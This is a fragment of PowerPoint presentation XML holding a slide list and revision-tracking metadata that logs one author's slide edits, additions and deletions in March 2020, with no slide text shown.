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256" r:id="rId2"/>
    <p:sldId id="588" r:id="rId3"/>
    <p:sldId id="613" r:id="rId4"/>
    <p:sldId id="604" r:id="rId5"/>
    <p:sldId id="592" r:id="rId6"/>
    <p:sldId id="593" r:id="rId7"/>
    <p:sldId id="615" r:id="rId8"/>
    <p:sldId id="594" r:id="rId9"/>
    <p:sldId id="596" r:id="rId10"/>
    <p:sldId id="600" r:id="rId11"/>
    <p:sldId id="606" r:id="rId12"/>
    <p:sldId id="607" r:id="rId13"/>
    <p:sldId id="614" r:id="rId14"/>
    <p:sldId id="609" r:id="rId15"/>
    <p:sldId id="608" r:id="rId16"/>
    <p:sldId id="610" r:id="rId17"/>
    <p:sldId id="611" r:id="rId18"/>
    <p:sldId id="612" r:id="rId19"/>
    <p:sldId id="60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S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{A15A658B-633B-325C-EC57-27F0600FE21D}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{A15A658B-633B-325C-EC57-27F0600FE21D}" dt="2020-03-31T13:22:46.930" v="260" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{A15A658B-633B-325C-EC57-27F0600FE21D}" dt="2020-03-31T13:22:46.008" v="258" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3576579015" sldId="594"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{A15A658B-633B-325C-EC57-27F0600FE21D}" dt="2020-03-31T13:22:46.008" v="25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S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{A15A658B-633B-325C-EC57-27F0600FE21D}" dt="2020-03-31T13:22:43.055" v="255" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3576579015" sldId="594"/>
            <ac:spMk id="3" creationId="{5E2D4D37-B430-4CF2-B9E8-21045B8A2442}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:53:39.081" v="4315" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:56:49.664" v="404" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:56:49.664" v="404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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:49:05.476" v="28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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:58:27.389" v="581" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="34493695" sldId="588"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:56:46.371" v="398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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:58:27.389" v="581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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:27.926" v="424" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="309114280" sldId="589"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:50:41.992" v="29" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3694468642" sldId="590"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:25.279" v="421" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3957164049" sldId="591"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:00.627" v="412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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:00.627" v="412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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:54:19.604" v="261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bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:55:28.869" v="279" actId="692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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:46:15.882" v="3583" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="186350803" sldId="593"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:56:31.843" v="38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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:46:15.882" v="3583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bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:19.686" v="413" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="315206133" sldId="595"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:26:27.167" v="2168" actId="14861"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2184503986" sldId="595"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:53.301" v="468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04:01.223" v="1021" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184503986" sldId="595"/>
            <ac:spMk id="3" creationId="{E4DD9BDA-76BD-42BF-8240-DFE65A9F6B08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:05:22.201" v="1090"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184503986" sldId="595"/>
            <ac:spMk id="5" creationId="{15A1E978-A42B-4D55-921C-9FA177AC39A3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:04:56.781" v="1073" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184503986" sldId="595"/>
            <ac:spMk id="6" creationId="{0860451D-C80E-4FA6-BB41-9A2ABCC316B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:26:27.167" v="2168" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184503986" sldId="595"/>
            <ac:picMk id="4" creationId="{33B4FF74-80A0-49A4-9737-511B20327150}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:05:19.584" v="1088" actId="692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15:24.521" v="1348" actId="692"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2712760629" sldId="596"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:05:40.754" v="1104" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2712760629" sldId="596"/>
            <ac:spMk id="2" creationId="{630600FE-3C69-4040-A489-E7805FCE6007}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:14:50.105" v="1331" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2712760629" sldId="596"/>
            <ac:spMk id="3" creationId="{0D1F7CAF-BE37-4BB6-80FC-BE4FE2BCBF8F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:15:24.521" v="1348" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2712760629" sldId="596"/>
            <ac:picMk id="4" creationId="{BEBE13E2-F953-4E22-B23C-BC2AB2AA33DB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:23.357" v="416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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:24.152" v="418" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1444812365" sldId="597"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:53:39.081" v="4315" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3605241094" sldId="597"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:15:39.533" v="1362" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3605241094" sldId="597"/>
            <ac:spMk id="2" creationId="{9712665C-EA5C-49D5-AE32-DB26EF67535C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:53:39.081" v="4315" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3605241094" sldId="597"/>
            <ac:spMk id="3" creationId="{F142AB73-C0AA-4B70-9D9C-FA1D850C2834}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:21:51.436" v="1934" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3605241094" sldId="597"/>
            <ac:spMk id="6" creationId="{BBCC2E10-93FF-4878-B737-59D4C64135AF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:22:21.363" v="1965" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3605241094" sldId="597"/>
            <ac:spMk id="10" creationId="{49B3E636-E1BC-424F-911A-4167341F0E61}"/>
          </ac:spMkLst>
        </pc:sp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4" creationId="{4803C6A9-381A-4B70-A1BE-8D62437EBDBB}"/>
          </ac:picMkLst>
        </pc:pic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5" creationId="{490B9335-9922-40FF-B908-A217AF833431}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:21:43.460" v="1913" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3605241094" sldId="597"/>
            <ac:cxnSpMk id="7" creationId="{B5F9D7D2-3E90-46C5-B63A-7ADC05BD2E4A}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:22:11.363" v="1940" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3605241094" sldId="597"/>
            <ac:cxnSpMk id="11" creationId="{A226E5B2-7135-45E9-A9A8-692144A19B84}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:22.344" v="414" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="194211264" sldId="598"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:23:27.232" v="2011" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1665176142" sldId="598"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:22:48.147" v="1982" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1665176142" sldId="598"/>
            <ac:spMk id="2" creationId="{7D5C3043-C56E-41EB-94EB-879817E76746}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:22:59.644" v="2004" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1665176142" sldId="598"/>
            <ac:spMk id="3" creationId="{6FEBC79C-7914-4524-B409-29CF514F1696}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:22.858" v="415" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="817173972" sldId="599"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add ord">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:27:22.423" v="2229" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4179620376" sldId="599"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:23:18.686" v="2010" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4179620376" sldId="599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27:22.423" v="2229" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4179620376" sldId="599"/>
            <ac:spMk id="3" creationId="{E4DD9BDA-76BD-42BF-8240-DFE65A9F6B08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:26:02.518" v="2158" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4179620376" sldId="599"/>
            <ac:spMk id="6" creationId="{0860451D-C80E-4FA6-BB41-9A2ABCC316B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:25:50.425" v="2137" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4179620376" sldId="599"/>
            <ac:picMk id="4" creationId="{33B4FF74-80A0-49A4-9737-511B20327150}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:26:14.943" v="2165" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4179620376" sldId="599"/>
            <ac:picMk id="5" creationId="{F75826EB-F264-46B3-B075-3D1BC456FF9F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:25:56.511" v="2140" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4179620376" sldId="599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31:39.474" v="2547" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2099074545" sldId="600"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:27:47.721" v="2250" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2099074545" sldId="600"/>
            <ac:spMk id="2" creationId="{E386ABFA-ECE2-42D8-B94E-42CD60A76B88}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:31:39.474" v="2547" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2099074545" sldId="600"/>
            <ac:spMk id="3" creationId="{D2A95EDD-A531-479D-B93C-EFF7E4CF5D1C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:30:32.707" v="2485" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2099074545" sldId="600"/>
            <ac:spMk id="5" creationId="{F3548552-3343-4A9D-AF56-A8D911FC2198}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:30:09.719" v="2454" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2099074545" sldId="600"/>
            <ac:picMk id="4" creationId="{8636A0E7-BBCC-48F2-8F4C-7F83B8DE9A49}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:30:35.382" v="2486" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2099074545" sldId="600"/>
            <ac:cxnSpMk id="6" creationId="{968AA523-52EB-459F-A996-6A5A15BD398C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:23.771" v="417" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3971421311" sldId="600"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:36:21.954" v="2926" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1495885431" sldId="601"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:30:46.624" v="2497" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1495885431" sldId="601"/>
            <ac:spMk id="2" creationId="{2C626E04-08C1-4465-9849-5D1F91CFC013}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:36:21.954" v="2926" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1495885431" sldId="601"/>
            <ac:spMk id="3" creationId="{CE8055EA-C6A0-41EE-8EFC-340560DC4ED3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:35:12.243" v="2810" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1495885431" sldId="601"/>
            <ac:picMk id="4" creationId="{1FF41D4C-6E21-4D8E-92AB-7F83931445E7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:24.538" v="41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47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T17:57:24.923" v="420" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2118454917" sldId="602"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:41:53.875" v="3312" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4124090435" sldId="602"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:35:20.123" v="2821" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4124090435" sldId="602"/>
            <ac:spMk id="2" creationId="{4C9BAFCF-2251-445E-A145-2E6D0F5FF995}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:41:53.875" v="3312" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4124090435" sldId="602"/>
            <ac:spMk id="3" creationId="{D1F83260-EF1F-4D26-8943-1232F6BE8EC1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{47B1EE89-E28E-4BF6-844B-4FDFCF9C0ECE}" dt="2020-03-19T18:41:07.074" v="3294" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4124090435" sldId="602"/>
            <ac:spMk id="6" creationId="{798E7075-D301-4843-9C74-B4762B2D23A6}"/>
          </ac:spMkLst>
        </pc:spChg>
